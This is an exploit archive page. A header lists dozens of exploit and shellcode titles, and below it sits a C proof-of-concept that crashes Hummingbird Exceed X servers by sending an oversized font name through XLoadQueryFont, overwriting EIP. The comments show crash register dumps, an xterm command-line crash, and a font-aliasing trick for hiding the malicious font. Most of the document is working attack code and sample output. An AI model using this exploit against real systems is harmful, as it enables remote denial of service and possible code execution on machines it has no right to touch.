880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
192 lines
No EOL
6.6 KiB
C
192 lines
No EOL
6.6 KiB
C
// source: https://www.securityfocus.com/bid/8194/info
|
|
|
|
The Exceed server and client have been reported prone to a remotely triggered buffer overflow vulnerability. An attacker may trigger this vulnerability by sending excessive data as a font name to the server via a malicios XLoadQueryFont() request, or by passing a malicious font name from the server to the client in a manner sufficient to trigger the overflow. When the vulnerable software handles this request it will crash.
|
|
|
|
/*
|
|
* Crushing birds for fun and knowledge
|
|
* ------------------------------------
|
|
*
|
|
* HQOTD: "How secure do you want it"
|
|
* http://mimage.hummingbird.com/alt_content/binary/pdf/collateral/ds/exceed_ds_en.pdf
|
|
*
|
|
* I'll tell you: Much more please sirs.
|
|
*
|
|
* **************************************
|
|
*
|
|
* Exceed has some bugs caused by the way it handles fonts, in a local and remote
|
|
* context.
|
|
*
|
|
* Debug output created by master techniques:
|
|
* EAX = C0000000
|
|
* EBX = 00000000
|
|
* ECX = 40000000
|
|
* EDX = 00000501
|
|
* ESI = 41414141 <-------- // Here
|
|
* EDI = 0012E138
|
|
* EIP = 41414141 <-------- // Here
|
|
* ESP = 0012E0C8
|
|
* EBP = 0012E0F0
|
|
*
|
|
* A way to check that a server is not trying to exploit your PC could be:
|
|
* $ xlsfonts -display exceed_server:0.0
|
|
* ...
|
|
* --------0------
|
|
* --arial-bold-r---0-0-120-120-p-0-iso8859-1
|
|
* --arial-medium-r---0-0-120-120-p-0-iso8859-1
|
|
* AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... <-- Here
|
|
* ...
|
|
*
|
|
* A way to hide evil font would be through the use of font aliasing.
|
|
* -the first ever font spoofing technique, lol.
|
|
*
|
|
* [-] We can crash a local Exceed server * 2
|
|
* [-] We can crash a remote Exceed server * many lol
|
|
* [-] We can crash Exceed client that uses evil X Font Server * 1
|
|
* [-] We can write over EIP address * many lol
|
|
*
|
|
* Hummingbird informed 3 weeks ago, still no reply.
|
|
*
|
|
* **************************************
|
|
* rwxr-xr-x xterm exploit!
|
|
*
|
|
* $ export DISPLAY=192.168.1.31:0.0 //Valid host
|
|
* $ xterm -font `perl -e 'print "69r"x10101'`
|
|
* Segmentation fault (core dumped) //lol
|
|
* $ md5sum `which xterm`
|
|
* 09ebe34028b779eb73d4a31e987ee9ed /usr/X11R6/bin/xterm
|
|
*
|
|
* Root user can now have super 0day xterm sploit that s/he can use to own local user
|
|
* accounts!
|
|
*
|
|
* ** This would give root the ability to become any user on the system **
|
|
*
|
|
* More serious than su, it does not leave a log entry behind, real anon hacker style.
|
|
*
|
|
* **************************************
|
|
*
|
|
* This is just a little hobby that saves me going to clubs at the weekend, drinking
|
|
* beer and mumbling to some strange lethargic woman with alchohol driven motives.
|
|
*
|
|
* Computer security is #1 contraceptive, coming soon to an NHS near you.
|
|
*
|
|
* **************************************
|
|
*
|
|
* DNSCon is coming up - www.dnscon.org
|
|
*
|
|
* **************************************
|
|
*
|
|
* [c0ntex@darkside exceed]$ gcc -o exceed exceed.c -lX11 -L /usr/X11R6/lib
|
|
* [c0ntex@darkside exceed]$ ./exceed exploited:0.0
|
|
*
|
|
* [-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com
|
|
* [-] We are using DISPLAY variable: exploited:0.0
|
|
* [-] Hang on to your feathers, sending some buffer
|
|
*
|
|
* ..
|
|
* XIO: fatal IO error 104 (Connection reset by peer) on X server "exploited:0.0"
|
|
* after 11 requests (9 known processed) with 0 events remaining.
|
|
*
|
|
* **************************************
|
|
*
|
|
* Rants:
|
|
* Knowledge is freely given and should be freely shared, however making money from
|
|
* other peoples research in any way is simply unethical. =|
|
|
*
|
|
* SF: Clever move making your vulnerability archive public `again`, this will draw
|
|
* back many versed in dot slash t3qN33kZ to infect themselves with trojan opcodes.
|
|
* *LOL*
|
|
*
|
|
* Regards to all, keep it real.
|
|
*
|
|
* **************************************
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <X11/Xlib.h>
|
|
|
|
#define BIGBIRD 6001
|
|
#define DIRTY_VAL 69
|
|
#define MAX_BORDER_LEN 3
|
|
#define WIN_TIMER 5
|
|
#define WIN_TITLE "simple PoC window - lets shoot birds"
|
|
|
|
typedef char Birds;
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
Birds nests[BIGBIRD];
|
|
Birds egg[2] = { 'A', '\0' };
|
|
Birds *feathersN;
|
|
Birds *HABITAT = "DISPLAY";
|
|
|
|
unsigned short eggs, chicks;
|
|
unsigned short winW, winH, feathersW, feathersH;
|
|
unsigned long locX, locY;
|
|
unsigned long winBDR;
|
|
|
|
|
|
Display* feathers;
|
|
Window wingspan;
|
|
XFontStruct* birdcull;
|
|
|
|
fprintf(stderr, "\n\n[-] Exceed [ALL] EIP Attack - c0ntex@hushmail.com\n");
|
|
|
|
if(argc < 2) {
|
|
fprintf(stderr, "[-] Please set IP/Hostname for DISPLAY pointer!\n");
|
|
fprintf(stderr, "[-] Usage: %s <hostname/IP:feathers>\n\n", argv[0]);
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
if(setenv(HABITAT, argv[1], 1) <0) {
|
|
perror("setenv"); return EXIT_FAILURE;
|
|
}
|
|
|
|
fprintf(stderr, "[-] Ok, using DISPLAY variable: %s\n", argv[1]);
|
|
|
|
for(eggs = 0; eggs < BIGBIRD -1; eggs++)
|
|
if(strncat(nests, egg, sizeof(BIGBIRD)-1) == NULL) {
|
|
perror("strncat"); return EXIT_FAILURE;
|
|
}
|
|
|
|
if((feathers = XOpenDisplay(feathersN)) == NULL) {
|
|
perror("XOpenDisplay"); return EXIT_FAILURE;
|
|
}
|
|
|
|
chicks = DefaultScreen(feathers);
|
|
|
|
winW = ((feathersW = DisplayWidth(feathers, chicks)) /3);
|
|
winH = ((feathersH = DisplayHeight(feathers, chicks)) /3);
|
|
locX = DIRTY_VAL; locY = DIRTY_VAL; winBDR = MAX_BORDER_LEN;
|
|
|
|
wingspan = XCreateSimpleWindow(feathers, RootWindow(feathers, chicks),
|
|
locX, locY, winW, winH, winBDR,
|
|
BlackPixel(feathers, chicks),
|
|
WhitePixel(feathers, chicks));
|
|
if(XCreateSimpleWindow == NULL) {
|
|
perror("XCreateSimpleWindow"); return EXIT_FAILURE;
|
|
}
|
|
|
|
XStoreName(feathers, wingspan, WIN_TITLE);
|
|
if(XStoreName == NULL) {
|
|
perror("XOpenDisplay"); return EXIT_FAILURE;
|
|
}
|
|
|
|
XMapWindow(feathers, wingspan);
|
|
if(XMapWindow == NULL) {
|
|
perror("XOpenDisplay"); return EXIT_FAILURE;
|
|
}
|
|
|
|
fprintf(stderr, "[-] Hang on to your feathers, sending some buffer \n\n");
|
|
|
|
if((birdcull = XLoadQueryFont(feathers, nests)) == NULL) {
|
|
perror("XLoadQueryFont"); return EXIT_FAILURE;
|
|
}
|
|
|
|
XCloseDisplay(feathers);
|
|
|
|
return EXIT_SUCCESS;
|
|
} |